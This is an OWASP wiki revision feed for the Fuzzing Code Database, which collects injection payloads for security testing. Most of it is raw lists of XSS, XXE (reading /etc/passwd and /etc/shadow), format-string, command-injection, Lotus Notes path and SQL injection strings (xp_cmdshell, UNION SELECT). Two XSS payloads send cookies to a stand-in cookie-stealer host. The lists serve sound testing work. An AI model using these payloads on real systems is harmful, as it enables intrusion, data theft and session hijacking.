ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=77768</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=77768"/>
				<updated>2010-02-02T17:25:51Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection software. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated.&lt;br /&gt;
We want to collect all these statements, merging the statements from several projects like [[WebScarab]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results.&lt;br /&gt;
Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010''''&lt;br /&gt;
&lt;br /&gt;
* Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009'''&lt;br /&gt;
	&lt;br /&gt;
* Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements''&lt;br /&gt;
&lt;br /&gt;
* 15 new XML Statements&lt;br /&gt;
* 93 new SQL Injections Statements&lt;br /&gt;
* 67 new Traversal Directory Statements&lt;br /&gt;
* Delete 33 XSS Statement Duplicate&lt;br /&gt;
* 30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009'''&lt;br /&gt;
	&lt;br /&gt;
* Updated the objectives of the project. &lt;br /&gt;
&lt;br /&gt;
'''21 July 2009'''&lt;br /&gt;
&lt;br /&gt;
* Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.&lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project:&lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project&lt;br /&gt;
2 - Browser&lt;br /&gt;
3 - Operational System&lt;br /&gt;
4 - Databases&lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:&lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.&lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.&lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements.&lt;br /&gt;
&lt;br /&gt;
==== Statements ====&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
